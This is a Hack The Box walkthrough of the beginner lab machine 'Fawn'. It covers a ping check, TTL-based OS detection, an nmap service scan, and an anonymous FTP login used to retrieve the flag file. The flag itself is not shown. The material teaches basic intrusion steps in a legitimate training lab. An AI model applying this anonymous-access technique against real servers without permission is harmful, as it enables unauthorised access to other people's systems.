---
sidebar_position: 2
sidebar_label: 🦌 Fawn
description: On this machine, we will learn more about the FTP service and how we can use it.
last_update:
  date: 2022/06/08
  author: Raúl Sánchez
tags:
  - FTP
keywords: 
  - Hack The Box
  - HTB
  - HTB Writeups
  - Hacking
  - HTB Walkthrough
  - Write-up
  - Walkthrough
---

# Fawn

> On this machine, we will learn more about the FTP service and how we can use it.

## 0. Start the machine

To start machine, Just click "Spawn Machine".

![Spawn Fawn Machine](fawn1.png)

Then you can see the **IP** address for that machine. In this case the machine has the IP `10.129.233.56`. Before going to enumeration steps we can simply ping to the IP address and check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```python
❯ ping -c1 10.129.233.56
PING 10.129.233.56 (10.129.233.56) 56(84) bytes of data.
64 bytes from 10.129.233.56: icmp_seq=1 ttl=63 time=80.4 ms

--- 10.129.233.56 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 80.418/80.418/80.418/0.000 ms
```

:::caution Disclaimer
No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️
:::

## 1. Enumeration

The first thing to do is to identify which operating system you are using. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool to find out.

```python
❯ whichSystem.py 10.129.233.56

10.129.233.56 (ttl -> 63): Linux
```

:::info
By default Linux has a TTL of 64 and Windows has 128.
:::info

Then, we will use the [nmap](https://nmap.org/) tool with the [-sV](https://nmap.org/book/man-version-detection.html) parameter to see the services and their version.

```python
❯ nmap -sV 10.129.233.56
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-08 17:01 CEST
Nmap scan report for 10.129.233.56
Host is up (0.061s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.87 seconds
```

As we see, this machine has only one port open and that is [ftp](https://en.wikipedia.org/wiki/File\_Transfer\_Protocol).

:::note
The **File Transfer Protocol** (**FTP**) is a standard communication protocol used for the transfer of computer files from a server to a client on a computer network. FTP is built on a client–server model architecture using separate control and data connections between the client and the server.
:::

## 2. Foothold

Let's connect to the machine via ftp. A typical misconfiguration for running FTP services allows an **anonymous** account to access the service like any other authenticated user.

```python
❯ ftp 10.129.233.56
Connected to 10.129.233.56.
220 (vsFTPd 3.0.3)
Name (10.129.233.56:username): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 
```

Success! We have logged into the target system. We can now use the `ls` command to take a look around the directory.&#x20;

```shell
ftp> ls
229 Entering Extended Passive Mode (|||37749|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
```

We can download the file to our local machine with `get`. Finally, use quit to end this ftp session and see the flag with `cat`.

```shell
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||50952|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |***************************************|    32      529.66 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.38 KiB/s)
ftp> quit
221 Goodbye.
❯ cat flag.txt
```
